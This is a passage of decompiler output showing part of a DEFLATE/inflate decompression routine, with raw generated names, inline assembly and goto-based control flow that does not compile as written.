				signed int _t862;
				signed char _t863;
				signed char _t864;
				intOrPtr _t866;
				void* _t869;
				void* _t870;
				void* _t871;
				signed int _t874;
				signed int _t877;
				void* _t878;
				void* _t879;
				void* _t880;
				void* _t881;
				void* _t882;
				void* _t883;
				void* _t884;
				void* _t885;
				signed char _t894;
				signed int _t896;
				void* _t897;
				void* _t898;
				signed int _t901;
				signed int _t902;
				signed char _t903;
				intOrPtr _t905;
				intOrPtr _t907;
				void* _t910;
				signed char _t911;
				signed char _t912;
				signed char _t913;
				signed int _t917;
				signed char _t922;
				void* _t923;
				void* _t924;
				signed int _t927;
				signed char* _t932;
				signed int _t936;
				signed char _t940;
				signed int _t941;
				signed char _t944;
				signed int _t945;
				void* _t953;
				signed int _t968;
				signed int _t969;
				signed int _t972;
				signed int _t974;
				signed int _t978;
				signed int* _t979;
				signed char* _t984;
				void* _t985;
				void* _t990;
				signed int _t991;
				signed int _t994;
				signed int _t995;
				signed int _t997;
				signed int _t999;
				signed int _t1000;
				signed int _t1003;
				signed int _t1004;
				int _t1005;
				int _t1007;
				signed int _t1008;
				unsigned int _t1011;
				void* _t1015;
				intOrPtr _t1016;
				signed int _t1017;
				signed int _t1021;
				signed char _t1025;
				void* _t1029;
				signed char _t1030;
				signed int _t1031;
				void* _t1033;
				void* _t1035;
				unsigned int _t1036;
				signed int _t1037;
				void* _t1039;
				void* _t1041;
				int _t1046;
				signed int _t1047;
				signed int _t1049;
				signed int _t1050;
				unsigned int _t1052;
				signed int _t1053;
				unsigned int _t1055;
				signed int _t1056;
				signed char _t1064;
				void* _t1065;
				void* _t1067;
				void* _t1068;

				L0:
				while(1) {
					L0:
					_t597 = __eax + 1 - 0x20;
					 *_t597 =  *_t597 + _t597;
					_t847 = __ebx + _t597;
					_t598 = _t597 + 1;
					 *_t598 =  *_t598 ^ _t598;
					 *_t598 = _t598 +  *_t598;
					 *0xde0 =  *0xde0 + _t598;
					memset(_t598, ??, ??);
					asm("movdqa xmm0, [0x121ae0]");
					_t1068 = _t1067 + 0xc;
					asm("movdqu [edi+0x40], xmm0");
					asm("movdqu [edi+0x50], xmm0");
					asm("movdqu [edi+0x60], xmm0");
					asm("movdqu [edi+0x70], xmm0");
					asm("movdqu [edi+0x80], xmm0");
					asm("movdqu [edi+0x90], xmm0");
					asm("movdqu [edi+0xa0], xmm0");
					asm("movdqu [edi+0xb0], xmm0");
					asm("movdqu [edi+0xc0], xmm0");
					_t1029 = __edi + 0xd0;
					asm("movdqa xmm0, [0x121af0]");
					asm("movdqu [edi], xmm0");
					asm("movdqu [edi+0x10], xmm0");
					asm("movdqu [edi+0x20], xmm0");
					asm("movdqu [edi+0x30], xmm0");
					asm("movdqu [edi+0x40], xmm0");
					asm("movdqu [edi+0x50], xmm0");
					asm("movdqu [edi+0x60], xmm0");
					asm("movdqa xmm0, [0x121ad0]");
					asm("movdqu [edi+0x70], xmm0");
					asm("movq [edi+0x80], xmm0");
					 *((intOrPtr*)(_t1029 + 0x88)) = 0x8080808;
					 *((intOrPtr*)(_t1029 + 0x8c)) = 0x8080808;
					_t1030 =  *(_t1065 - 0x14);
					while(1) {
						L141:
						_t600 =  *(_t1030 + 0x18);
						if(_t600 >= 0) {
							break;
						}
						L218:
						_t968 =  *(_t1065 - 4);
						while(1) {
							L39:
							_t860 =  *(_t1065 - 0x20) - _t847;
							__eflags = _t860 - 4;
							if(_t860 < 4) {
								goto L58;
							}
							L40:
							_t1030 =  *(_t1065 - 0x14);
							__eflags =  *((intOrPtr*)(_t1065 - 0x40)) -  *(_t1065 - 0x10) - 2;
							if( *((intOrPtr*)(_t1065 - 0x40)) -  *(_t1065 - 0x10) < 2) {
								goto L58;
							} else {
								L41:
								__eflags = _t1050 - 0xf;
								if(_t1050 < 0xf) {
									_t1017 =  *(_t847 + 1) & 0x000000ff;
									_t860 = _t1050;
									_t733 =  *_t847 & 0x000000ff;
									_t847 = _t847 + 2;
									 *(_t1065 - 0x18) = _t847;
									 *(_t1065 - 4) =  *(_t1065 - 4) | (_t1017 << 0x00000008 | _t733) << _t860;
									_t1050 = _t1050 + 0x10;
									__eflags = _t1050;
									_t968 =  *(_t1065 - 4);
								}
								_t618 =  *((short*)(_t1030 + 0x160 + (_t968 & 0x000003ff) * 2));
								 *(_t1065 - 8) = _t618;
								__eflags = _t618;
								if(_t618 < 0) {
									L45:
									goto 0x311333;
									asm("int3");
									asm("int3");
									asm("int3");
									do {
										L46:
										_t685 = _t968 >> _t860;
										_t860 = _t860 + 1;
										_t618 = (_t685 & 0x00000001) +  !_t847;
										_t847 =  *((short*)(_t1030 + 0x960 + _t618 * 2));
										__eflags = _t847;
									} while (_t847 < 0);
									 *(_t1065 - 8) = _t847;
									_t847 =  *(_t1065 - 0x18);
								} else {
									L44:
									_t860 = _t618 >> 9;
								}
								L48:
								_t968 = _t968 >> _t860;
								_t1050 = _t1050 - _t860;
								_t861 =  *(_t1065 - 8);
								 *(_t1065 - 4) = _t968;
								__eflags = _t861 & 0x00000100;
								if((_t861 & 0x00000100) != 0) {
									L84:
									_t862 = _t861 & 0x000001ff;
									 *(_t1065 - 8) = _t862;
									__eflags = _t862 - 0x100;
									if(_t862 != 0x100) {
										L219:
										_t608 = _t862 * 4 - 0x404;
										_t863 =  *(_t608 + 0x121010);
										_t609 =  *(_t608 + 0x121a48);
										 *(_t1065 - 0x38) = _t863;
										 *(_t1065 - 8) = _t609;
										__eflags = _t863;
										if(_t863 == 0) {
											L225:
											__eflags = _t1050 - 0xf;
											if(_t1050 >= 0xf) {
												L3:
												_t612 =  *((short*)(_t1030 + 0xf00 + (_t968 & 0x000003ff) * 2));
												 *(_t1065 - 0x1c) = _t612;
												__eflags = _t612;
												if(_t612 < 0) {
													L5:
													goto 0x3112ba;
													asm("int3");
													asm("int3");
													asm("int3");
													do {
														L7:
														_t614 = _t968 >> _t863;
														_t863 = _t863 + 1;
														_t847 =  *((short*)(_t1030 + 0x1700 + ((_t614 & 0x00000001) +  !_t847) * 2));
														__eflags = _t847;
													} while (_t847 < 0);
													 *(_t1065 - 0x1c) = _t847;
													_t847 =  *(_t1065 - 0x18);
													_t617 =  *(_t1065 - 0x1c);
												} else {
													L4:
													_t863 = _t612 >> 9;
													_t617 = _t612 & 0x000001ff;
												}
												L9:
												_t968 = _t968 >> _t863;
												_t1050 = _t1050 - _t863;
												_t864 =  *(0x121090 + _t617 * 4);
												_t618 =  *(0x121110 + _t617 * 4);
												 *(_t1065 - 4) = _t968;
												 *(_t1065 - 0x38) = _t864;
												 *(_t1065 - 0x28) = _t618;
												__eflags = _t864;
												if(_t864 == 0) {
													L15:
													_t866 =  *(_t1065 - 0x10) -  *((intOrPtr*)(_t1065 + 0xc));
													 *((intOrPtr*)(_t1065 - 0x48)) = _t866;
													__eflags = _t618 - _t866;
													if(_t618 <= _t866) {
														L17:
														_t1030 =  *(_t1065 - 0x14);
														_t869 = (_t866 - _t618 &  *(_t1065 - 0x34)) +  *((intOrPtr*)(_t1065 + 0xc));
														__eflags =  *(_t1065 - 0x10) - _t869;
														 *(_t1065 - 0xc) = _t869;
														_t620 =  >  ?  *(_t1065 - 0x10) : _t869;
														_t870 =  *(_t1065 - 8);
														_t621 = ( >  ?  *(_t1065 - 0x10) : _t869) + _t870;
														__eflags = ( >  ?  *(_t1065 - 0x10) : _t869) + _t870 -  *((intOrPtr*)(_t1065 - 0x40));
														if(( >  ?  *(_t1065 - 0x10) : _t869) + _t870 <=  *((intOrPtr*)(_t1065 - 0x40))) {
															L21:
															__eflags = _t870 - 9;
															if(_t870 < 9) {
																L30:
																goto 0x3112f7;
																asm("int3");
																do {
																	L32:
																	_t870 = _t870 - 3;
																	 *_t1030 =  *_t968 & 0x000000ff;
																	 *((char*)(_t1030 + 1)) =  *(_t968 + 1) & 0x000000ff;
																	_t624 =  *(2 + _t968) & 0x000000ff;
																	_t968 = _t968 + 3;
																	 *(2 + _t1030) = _t624;
																	_t1030 = _t1030 + 3;
																	__eflags = _t870 - 2;
																} while (_t870 > 2);
																goto L33;
															} else {
																L22:
																__eflags = _t870 -  *(_t1065 - 0x28);
																if(_t870 >  *(_t1065 - 0x28)) {
																	goto L30;
																} else {
																	L23:
																	_t1041 =  *(_t1065 - 0xc);
																	_t871 =  *(_t1065 - 0x10);
																	_t738 = _t1041 + (_t870 & 0xfffffff8);
																	 *(_t1065 - 0x24) = _t738;
																	_t1025 = _t738;
																	do {
																		L24:
																		 *_t871 =  *_t1041;
																		_t740 =  *((intOrPtr*)(_t1041 + 4));
																		_t1041 = _t1041 + 8;
																		 *((intOrPtr*)(_t871 + 4)) = _t740;
																		_t871 = _t871 + 8;
																		__eflags = _t1041 - _t1025;
																	} while (_t1041 < _t1025);
																	_t968 =  *(_t1065 - 4);
																	 *(_t1065 - 0x10) = _t871;
																	_t870 =  *(_t1065 - 8) & 0x00000007;
																	 *(_t1065 - 0xc) = _t1041;
																	_t1030 =  *(_t1065 - 0x14);
																	 *(_t1065 - 8) = _t870;
																	__eflags = _t870 - 3;
																	if(_t870 >= 3) {
																		goto L30;
																	} else {
																		goto L26;
																	}
																}
															}
															continue;
														} else {
															while(1) {
																L18:
																_t741 = _t870;
																_t870 = _t870 - 1;
																 *(_t1065 - 8) = _t870;
																__eflags = _t741;
																if(_t741 == 0) {
																	goto L39;
																}
																L19:
																__eflags =  *(_t1065 - 0x10) -  *((intOrPtr*)(_t1065 - 0x40));
																if( *(_t1065 - 0x10) >=  *((intOrPtr*)(_t1065 - 0x40))) {
																	L238:
																	 *(_t1065 - 0xc) = 2;
																	 *_t1030 = 0x35;
																	goto L292;
																} else {
																	L20:
																	 *(_t1065 - 0x10) =  *(_t1065 - 0x10) + 1;
																	 *((intOrPtr*)(_t1065 - 0x48)) =  *((intOrPtr*)(_t1065 - 0x48)) + 1;
																	 *( *(_t1065 - 0x10)) =  *((intOrPtr*)(( *((intOrPtr*)(_t1065 - 0x48)) -  *(_t1065 - 0x28) &  *(_t1065 - 0x34)) +  *((intOrPtr*)(_t1065 + 0xc))));
																	_t968 =  *(_t1065 - 4);
																	continue;
																}
																goto L295;
															}
															while(1) {
																L39:
																_t860 =  *(_t1065 - 0x20) - _t847;
																__eflags = _t860 - 4;
																if(_t860 < 4) {
																	goto L58;
																}
																goto L40;
															}
															goto L58;
														}
													} else {
														L16:
														__eflags =  *(_t1065 + 0x18) & 0x00000004;
														if(( *(_t1065 + 0x18) & 0x00000004) != 0) {
															L270:
															_t689 = _t618 | 0xffffffff;
															 *_t1030 = 0x25;
															goto L291;
														} else {
															goto L17;
														}
													}
												} else {
													L10:
													__eflags = _t1050 - _t864;
													if(_t1050 >= _t864) {
														L13:
														_t1050 = _t1050 - _t864;
														_t749 = (_t618 << _t864) - 0x00000001 & _t968;
														_t968 = _t968 >> _t864;
														_t28 = _t1065 - 0x28;
														 *_t28 =  *(_t1065 - 0x28) + _t749;
														__eflags =  *_t28;
														_t618 =  *(_t1065 - 0x28);
														 *(_t1065 - 4) = _t968;
														goto L15;
													} else {
														while(1) {
															L11:
															__eflags = _t847 -  *(_t1065 - 0x20);
															if(_t847 >=  *(_t1065 - 0x20)) {
																break;
															}
															L12:
															_t618 = ( *_t847 & 0x000000ff) << _t1050;
															_t847 = _t847 + 1;
															_t864 =  *(_t1065 - 0x38);
															_t968 = _t968 | _t618;
															_t1050 = _t1050 + 8;
															 *(_t1065 - 0x18) = _t847;
															 *(_t1065 - 4) = _t968;
															__eflags = _t1050 - _t864;
															if(_t1050 < _t864) {
																continue;
															} else {
																goto L13;
															}
															goto L295;
														}
														L263:
														 *_t1030 = 0x1b;
														goto L285;
													}
												}
											} else {
												L226:
												__eflags =  *(_t1065 - 0x20) - _t847 - 2;
												if( *(_t1065 - 0x20) - _t847 >= 2) {
													L237:
													_t991 =  *(_t847 + 1) & 0x000000ff;
													_t753 =  *_t847 & 0x000000ff;
													_t847 = _t847 + 2;
													_t1030 =  *(_t1065 - 0x14);
													_t863 = _t1050;
													 *(_t1065 - 0x18) = _t847;
													 *(_t1065 - 4) =  *(_t1065 - 4) | _t991 << _t1050 + 0x00000008 | _t753 << _t863;
													_t1050 = _t1050 + 0x10;
													_t968 =  *(_t1065 - 4);
												} else {
													do {
														L227:
														_t618 =  *((short*)(_t1030 + 0xf00 + (_t968 & 0x000003ff) * 2));
														 *(_t1065 - 0x24) = _t618;
														__eflags = _t618;
														if(_t618 < 0) {
															L231:
															__eflags = _t1050 - 0xa;
															if(_t1050 <= 0xa) {
																goto L1;
															} else {
																L232:
																L233:
																 *(_t1065 - 0x1c) = _t863;
																while(1) {
																	L234:
																	_t863 =  *((short*)(_t1030 + 0x1700 + ((_t968 >> _t863 & 0x00000001) +  !( *(_t1065 - 0x24))) * 2));
																	_t764 =  *(_t1065 - 0x1c) + 1;
																	 *(_t1065 - 0x24) = _t863;
																	 *(_t1065 - 0x1c) = _t764;
																	__eflags = _t863;
																	if(_t863 >= 0) {
																		goto L3;
																	}
																	L235:
																	_t618 = _t764 + 1;
																	__eflags = _t1050 - _t618;
																	if(_t1050 < _t618) {
																		goto L1;
																	} else {
																		L236:
																		_t863 =  *(_t1065 - 0x1c);
																		continue;
																	}
																	goto L295;
																}
																goto L3;
															}
														} else {
															L228:
															_t618 = _t618 >> 9;
															__eflags = _t618;
															if(_t618 == 0) {
																L1:
																__eflags = _t847 -  *(_t1065 - 0x20);
																if(_t847 >=  *(_t1065 - 0x20)) {
																	L264:
																	 *_t1030 = 0x1a;
																	goto L285;
																} else {
																	goto L2;
																}
															} else {
																L229:
																__eflags = _t1050 - _t618;
																if(_t1050 >= _t618) {
																	goto L3;
																} else {
																	L230:
																	goto L1;
																}
															}
														}
														goto L295;
														L2:
														_t863 = _t1050;
														_t758 = ( *_t847 & 0x000000ff) << _t863;
														_t847 = _t847 + 1;
														_t968 = _t968 | _t758;
														 *(_t1065 - 0x18) = _t847;
														_t1050 = _t1050 + 8;
														 *(_t1065 - 4) = _t968;
														__eflags = _t1050 - 0xf;
													} while (_t1050 < 0xf);
												}
												goto L3;
											}
										} else {
											L220:
											__eflags = _t1050 - _t863;
											if(_t1050 >= _t863) {
												L223:
												L224:
												_t1050 = _t1050 - _t863;
												_t767 = (_t609 << _t863) - 0x00000001 & _t968;
												_t968 = _t968 >> _t863;
												_t456 = _t1065 - 8;
												 *_t456 =  *(_t1065 - 8) + _t767;
												__eflags =  *_t456;
												 *(_t1065 - 4) = _t968;
												goto L225;
											} else {
												while(1) {
													L221:
													__eflags = _t847 -  *(_t1065 - 0x20);
													if(_t847 >=  *(_t1065 - 0x20)) {
														break;
													}
													L222:
													_t618 = ( *_t847 & 0x000000ff) << _t1050;
													_t847 = _t847 + 1;
													_t863 =  *(_t1065 - 0x38);
													_t968 = _t968 | _t618;
													_t1050 = _t1050 + 8;
													 *(_t1065 - 0x18) = _t847;
													 *(_t1065 - 4) = _t968;
													__eflags = _t1050 - _t863;
													if(_t1050 < _t863) {
														continue;
													} else {
														goto L223;
													}
													goto L295;
												}
												L262:
												 *_t1030 = 0x19;
												goto L285;
											}
										}
									} else {
										while(1) {
											L85:
											__eflags =  *(_t1030 + 0x14) & 0x00000001;
											if(( *(_t1030 + 0x14) & 0x00000001) != 0) {
												break;
											}
											L86:
											__eflags = _t1050 - 3;
											if(_t1050 >= 3) {
												L89:
												_t1050 = _t1050 - 3;
												_t698 = _t968 & 0x00000007;
												_t999 = _t968 >> 3;
												 *(_t1030 + 0x14) = _t698;
												_t699 = _t698 >> 1;
												__eflags = _t699;
												 *(_t1065 - 4) = _t999;
												 *(_t1065 - 0x1c) = _t1050;
												 *(_t1030 + 0x18) = _t699;
												if(_t699 != 0) {
													L124:
													__eflags = _t699 - 3;
													if(_t699 == 3) {
														L266:
														 *(_t1065 - 0xc) = 0xffffffff;
														 *_t1030 = 0xa;
														goto L292;
													} else {
														L125:
														__eflags = _t699 - 1;
														if(__eflags != 0) {
															L127:
															_t901 = 0;
															__eflags = 0;
															while(1) {
																L128:
																 *(_t1065 - 8) = _t901;
																__eflags = _t901 - 3;
																if(_t901 >= 3) {
																	break;
																}
																L129:
																_t618 =  *((char*)(_t901 + 0x121004));
																 *(_t1065 - 0x1c) = _t618;
																__eflags = _t1050 - _t618;
																if(_t1050 >= _t618) {
																	L132:
																	_t1015 = _t1030 + _t901 * 4;
																	_t1036 =  *(_t1065 - 4);
																	 *(_t1015 + 0x2c) = (0x00000001 <<  *(_t1065 - 0x1c)) - 0x00000001 & _t1036;
																	_t707 =  *(_t1065 - 8);
																	_t940 =  *((char*)(_t707 + 0x121004));
																	_t1037 = _t1036 >> _t940;
																	_t1050 = _t1050 - _t940;
																	_t941 = _t707;
																	 *(_t1065 - 4) = _t1037;
																	 *(_t1065 - 0x1c) = _t1050;
																	 *(_t1015 + 0x2c) =  *(_t1015 + 0x2c) +  *((intOrPtr*)(0x121a38 + _t941 * 4));
																	_t999 = _t1037;
																	_t1030 =  *(_t1065 - 0x14);
																	_t901 = _t941 + 1;
																	continue;
																} else {
																	while(1) {
																		L130:
																		__eflags = _t847 -  *(_t1065 - 0x20);
																		if(_t847 >=  *(_t1065 - 0x20)) {
																			break;
																		}
																		L131:
																		_t710 = ( *_t847 & 0x000000ff) << _t1050;
																		_t847 = _t847 + 1;
																		_t901 =  *(_t1065 - 8);
																		_t999 = _t999 | _t710;
																		_t1050 = _t1050 + 8;
																		 *(_t1065 - 0x18) = _t847;
																		 *(_t1065 - 4) = _t999;
																		_t618 =  *((char*)(_t901 + 0x121004));
																		 *(_t1065 - 0x1c) = _t618;
																		__eflags = _t1050 - _t618;
																		if(_t1050 < _t618) {
																			continue;
																		} else {
																			goto L132;
																		}
																		goto L295;
																	}
																	L248:
																	 *_t1030 = 0xb;
																	goto L285;
																}
																goto L295;
															}
															L133:
															L134:
															_t618 = memset(_t1030 + 0x1b80, 0, ??);
															_t1000 =  *(_t1065 - 4);
															_t1068 = _t1068 + 0xc;
															_t902 = 0;
															__eflags = 0;
															while(1) {
																L135:
																 *(_t1065 - 8) = _t902;
																__eflags = _t902 -  *((intOrPtr*)(_t1030 + 0x34));
																if(__eflags >= 0) {
																	break;
																}
																L136:
																__eflags = _t1050 - 3;
																if(_t1050 >= 3) {
																	L139:
																	_t936 = _t1000 & 0x00000007;
																	_t1000 = _t1000 >> 3;
																	_t1050 = _t1050 - 3;
																	 *(_t1065 - 4) = _t1000;
																	 *(_t1065 - 0x1c) = _t1050;
																	_t618 =  *( *(_t1065 - 8) + 0x121a24) & 0x000000ff;
																	 *(_t1030 + 0x1b80 + _t618) = _t936;
																	_t902 =  *(_t1065 - 8) + 1;
																	continue;
																} else {
																	while(1) {
																		L137:
																		__eflags = _t847 -  *(_t1065 - 0x20);
																		if(_t847 >=  *(_t1065 - 0x20)) {
																			break;
																		}
																		L138:
																		_t618 = ( *_t847 & 0x000000ff) << _t1050;
																		_t847 = _t847 + 1;
																		_t1000 = _t1000 | _t618;
																		 *(_t1065 - 0x18) = _t847;
																		_t1050 = _t1050 + 8;
																		 *(_t1065 - 4) = _t1000;
																		__eflags = _t1050 - 3;
																		if(_t1050 < 3) {
																			continue;
																		} else {
																			goto L139;
																		}
																		goto L295;
																	}
																	L249:
																	 *_t1030 = 0xe;
																	goto L285;
																}
																goto L295;
															}
															L140:
															 *((intOrPtr*)(_t1030 + 0x34)) = 0x13;
															goto L141;
														} else {
															L126:
															goto 0x3113af;
															asm("int3");
															asm("int3");
															 *((intOrPtr*)(_t699 + 0x2c)) = 0x120;
															goto L0;
														}
													}
												} else {
													L90:
													_t618 = _t1050 & 0x00000007;
													__eflags = _t1050 - _t618;
													if(_t1050 >= _t618) {
														L93:
														_t944 = _t1050 & 0x00000007;
														_t968 = _t999 >> _t944;
														_t1050 = _t1050 - _t944;
														 *(_t1065 - 4) = _t968;
														_t945 = 0;
														__eflags = 0;
														while(1) {
															L94:
															 *(_t1065 - 8) = _t945;
															__eflags = _t945 - 4;
															if(_t945 >= 4) {
																break;
															}
															L95:
															__eflags = _t1050;
															if(_t1050 == 0) {
																L101:
																__eflags = _t847 -  *(_t1065 - 0x20);
																if(_t847 >=  *(_t1065 - 0x20)) {
																	L244:
																	 *_t1030 = 7;
																	goto L285;
																} else {
																	L102:
																	_t618 =  *_t847;
																	_t847 = _t847 + 1;
																	(_t1030 + 0x2920)[_t945] = _t618;
																	_t945 = _t945 + 1;
																	 *(_t1065 - 0x18) = _t847;
																	continue;
																}
															} else {
																L96:
																__eflags = _t1050 - 8;
																if(_t1050 >= 8) {
																	L100:
																	(_t1030 + 0x2920)[_t945] = _t968;
																	_t1050 = _t1050 - 8;
																	_t968 = _t968 >> 8;
																	_t945 = _t945 + 1;
																	 *(_t1065 - 4) = _t968;
																	continue;
																} else {
																	while(1) {
																		L97:
																		__eflags = _t847 -  *(_t1065 - 0x20);
																		if(_t847 >=  *(_t1065 - 0x20)) {
																			break;
																		}
																		L98:
																		_t618 = ( *_t847 & 0x000000ff) << _t1050;
																		_t847 = _t847 + 1;
																		_t968 = _t968 | _t618;
																		 *(_t1065 - 0x18) = _t847;
																		_t1050 = _t1050 + 8;
																		 *(_t1065 - 4) = _t968;
																		__eflags = _t1050 - 8;
																		if(_t1050 < 8) {
																			continue;
																		} else {
																			L99:
																			_t945 =  *(_t1065 - 8);
																			goto L100;
																		}
																		goto L295;
																	}
																	L243:
																	 *_t1030 = 6;
																	goto L285;
																}
															}
															goto L295;
														}
														L103:
														_t618 =  *(_t1030 + 0x2922) & 0x000000ff;
														 *(_t1065 - 8) = ( *(_t1030 + 0x2921) & 0x000000ff) << 0x00000008 |  *(_t1030 + 0x2920) & 0x000000ff;
														__eflags =  *(_t1065 - 8) - ((( *(_t1030 + 0x2923) & 0x000000ff) << 0x00000008 | _t618) ^ 0x0000ffff);
														if( *(_t1065 - 8) != ((( *(_t1030 + 0x2923) & 0x000000ff) << 0x00000008 | _t618) ^ 0x0000ffff)) {
															L265:
															 *(_t1065 - 0xc) = 0xffffffff;
															 *_t1030 = 0x27;
															goto L292;
														} else {
															L104:
															_t953 =  *(_t1065 - 8);
															while(1) {
																L105:
																__eflags = _t953;
																if(_t953 == 0) {
																	goto L85;
																}
																L106:
																__eflags = _t1050;
																if(_t1050 == 0) {
																	L113:
																	_t618 =  *(_t1065 - 0x10);
																	while(1) {
																		L114:
																		__eflags = _t953;
																		if(_t953 == 0) {
																			break;
																		}
																		L116:
																		_t1016 =  *((intOrPtr*)(_t1065 - 0x40));
																		__eflags = _t618 - _t1016;
																		if(_t618 < _t1016) {
																			L118:
																			_t618 =  *(_t1065 - 0x20);
																			__eflags = _t847 - _t618;
																			if(_t847 >= _t618) {
																				L247:
																				_t1030 =  *(_t1065 - 0x14);
																				 *_t1030 = 0x26;
																				goto L285;
																			} else {
																				L119:
																				_t968 = _t1016 -  *(_t1065 - 0x10);
																				_t1039 = _t618 - _t847;
																				__eflags = _t968 - _t1039;
																				_t715 =  <  ? _t968 : _t1039;
																				__eflags = ( <  ? _t968 : _t1039) - _t953;
																				if(( <  ? _t968 : _t1039) >= _t953) {
																					_t1030 = _t953;
																				} else {
																					__eflags = _t968 - _t1039;
																					_t1030 =  <  ? _t968 : _t1039;
																				}
																				L122:
																				L123:
																				memcpy();
																				_t847 = _t847 + _t1030;
																				_t618 =  *(_t1065 - 0x10) + _t1030;
																				_t1068 = _t1068 + 0xc;
																				 *(_t1065 - 0x18) = _t847;
																				_t953 =  *(_t1065 - 8) - _t1030;
																				 *(_t1065 - 0x10) = _t618;
																				 *(_t1065 - 8) = _t953;
																				continue;
																			}
																		} else {
																			L117:
																			_t1030 =  *(_t1065 - 0x14);
																			 *(_t1065 - 0xc) = 2;
																			 *_t1030 = 9;
																			goto L292;
																		}
																		goto L295;
																	}
																	L115:
																	goto 0x311388;
																	asm("int3");
																	goto L85;
																} else {
																	L107:
																	__eflags = _t1050 - 8;
																	if(_t1050 >= 8) {
																		L110:
																		_t618 = _t968 & 0x000000ff;
																		_t968 = _t968 >> 8;
																		_t1050 = _t1050 - 8;
																		 *(_t1065 - 0x28) = _t618;
																		 *(_t1065 - 4) = _t968;
																		L111:
																		__eflags =  *(_t1065 - 0x10) -  *((intOrPtr*)(_t1065 - 0x40));
																		_t1030 =  *(_t1065 - 0x14);
																		if( *(_t1065 - 0x10) >=  *((intOrPtr*)(_t1065 - 0x40))) {
																			L246:
																			 *(_t1065 - 0xc) = 2;
																			 *_t1030 = 0x34;
																			goto L292;
																		} else {
																			L112:
																			 *(_t1065 - 0x10) =  *(_t1065 - 0x10) + 1;
																			 *( *(_t1065 - 0x10)) = _t618;
																			_t953 =  *(_t1065 - 8) - 1;
																			 *(_t1065 - 8) = _t953;
																			continue;
																		}
																	} else {
																		while(1) {
																			L108:
																			__eflags = _t847 -  *(_t1065 - 0x20);
																			if(_t847 >=  *(_t1065 - 0x20)) {
																				break;
																			}
																			L109:
																			_t618 = ( *_t847 & 0x000000ff) << _t1050;
																			_t847 = _t847 + 1;
																			_t968 = _t968 | _t618;
																			 *(_t1065 - 0x18) = _t847;
																			_t1050 = _t1050 + 8;
																			 *(_t1065 - 4) = _t968;
																			__eflags = _t1050 - 8;
																			if(_t1050 < 8) {
																				continue;
																			} else {
																				goto L110;
																			}
																			goto L295;
																		}
																		L245:
																		 *_t1030 = 0x33;
																		goto L285;
																	}
																}
																goto L295;
															}
															continue;
														}
													} else {
														while(1) {
															L91:
															__eflags = _t847 -  *(_t1065 - 0x20);
															if(_t847 >=  *(_t1065 - 0x20)) {
																break;
															}
															L92:
															_t721 = ( *_t847 & 0x000000ff) << _t1050;
															_t1050 = _t1050 + 8;
															_t999 = _t999 | _t721;
															_t847 = _t847 + 1;
															 *(_t1065 - 0x18) = _t847;
															_t618 = _t1050 & 0x00000007;
															 *(_t1065 - 4) = _t999;
															__eflags = _t1050 - _t618;
															if(_t1050 < _t618) {
																continue;
															} else {
																goto L93;
															}
															goto L295;
														}
														L242:
														 *_t1030 = 5;
														goto L285;
													}
												}
											} else {
												while(1) {
													L87:
													__eflags = _t847 -  *(_t1065 - 0x20);
													if(_t847 >=  *(_t1065 - 0x20)) {
														break;
													}
													L88:
													_t618 = ( *_t847 & 0x000000ff) << _t1050;
													_t847 = _t847 + 1;
													_t968 = _t968 | _t618;
													 *(_t1065 - 0x18) = _t847;
													_t1050 = _t1050 + 8;
													 *(_t1065 - 4) = _t968;
													__eflags = _t1050 - 3;
													if(_t1050 < 3) {
														continue;
													} else {
														goto L89;
													}
													goto L295;
												}
												L241:
												 *_t1030 = 3;
												L285:
												__eflags =  *(_t1065 + 0x18) & 0x00000002;
												L286:
												L287:
												_t628 =  !=  ? 1 : _t618;
												 *(_t1065 - 0xc) = _t628;
												__eflags = _t628 - 1;
												if(_t628 != 1) {
													L288:
													__eflags = _t628 - 0xfffffffc;
													if(_t628 != 0xfffffffc) {
														L289:
														L292:
														_t673 =  *(_t1065 - 0x3c);
														__eflags = _t847 - _t673;
														if(_t847 > _t673) {
															while(1) {
																L293:
																__eflags = _t1050 - 8;
																if(_t1050 < 8) {
																	goto L295;
																}
																L294:
																_t847 = _t847 - 1;
																_t1050 = _t1050 - 8;
																__eflags = _t847 - _t673;
																if(_t847 > _t673) {
																	continue;
																}
																goto L295;
															}
														}
													}
												}
											}
											goto L295;
										}
										L252:
										_t618 = _t1050 & 0x00000007;
										__eflags = _t1050 - _t618;
										if(_t1050 >= _t618) {
											L256:
											_t688 =  *(_t1065 - 0x3c);
											_t894 = _t1050 & 0x00000007;
											_t994 = _t968 >> _t894;
											_t1050 = _t1050 - _t894;
											 *(_t1065 - 4) = _t994;
											__eflags = _t847 - _t688;
											if(_t847 > _t688) {
												while(1) {
													L257:
													__eflags = _t1050 - 8;
													if(_t1050 < 8) {
														goto L259;
													}
													L258:
													_t847 = _t847 - 1;
													_t1050 = _t1050 - 8;
													__eflags = _t847 - _t688;
													if(_t847 > _t688) {
														continue;
													}
													goto L259;
												}
											}
											L259:
											L260:
											_t618 = _t1050;
											asm("bts edx, eax");
											__eflags = _t618 - 0x20;
											_t896 =  >=  ? _t994 : 0;
											_t995 = _t994 ^ _t896;
											__eflags = _t618 - 0x40;
											_t897 =  >=  ? _t995 : _t896;
											 *(_t1065 - 4) =  *(_t1065 - 4) & _t995 - 0x00000001;
											__eflags =  *(_t1065 + 0x18) & 0x00000001;
											if(( *(_t1065 + 0x18) & 0x00000001) == 0) {
												L290:
												_t689 = 0;
												__eflags = 0;
												 *_t1030 = 0x22;
												L291:
												 *(_t1065 - 0xc) = _t689;
												goto L292;
											} else {
												L261:
												_t898 = 0;
												while(1) {
													L277:
													 *(_t1065 - 8) = _t898;
													__eflags = _t898 - 4;
													if(_t898 >= 4) {
														goto L290;
													}
													L278:
													__eflags = _t1050;
													if(_t1050 != 0) {
														L281:
														_t997 =  *(_t1065 - 4);
														__eflags = _t1050 - 8;
														if(_t1050 >= 8) {
															L275:
															_t690 = _t997 & 0x000000ff;
															_t1050 = _t1050 - 8;
															__eflags = _t1050;
															 *(_t1065 - 4) = _t997 >> 8;
															goto L276;
														} else {
															L282:
															while(1) {
																L272:
																__eflags = _t847 -  *(_t1065 - 0x20);
																if(_t847 >=  *(_t1065 - 0x20)) {
																	break;
																}
																L273:
																_t618 = ( *_t847 & 0x000000ff) << _t1050;
																_t1050 = _t1050 + 8;
																_t997 = _t997 | _t618;
																_t847 = _t847 + 1;
																 *(_t1065 - 4) = _t997;
																__eflags = _t1050 - 8;
																if(_t1050 < 8) {
																	continue;
																} else {
																	L274:
																	_t898 =  *(_t1065 - 8);
																	goto L275;
																}
																goto L295;
															}
															L284:
															 *_t1030 = 0x29;
															goto L285;
														}
													} else {
														L279:
														__eflags = _t847 -  *(_t1065 - 0x20);
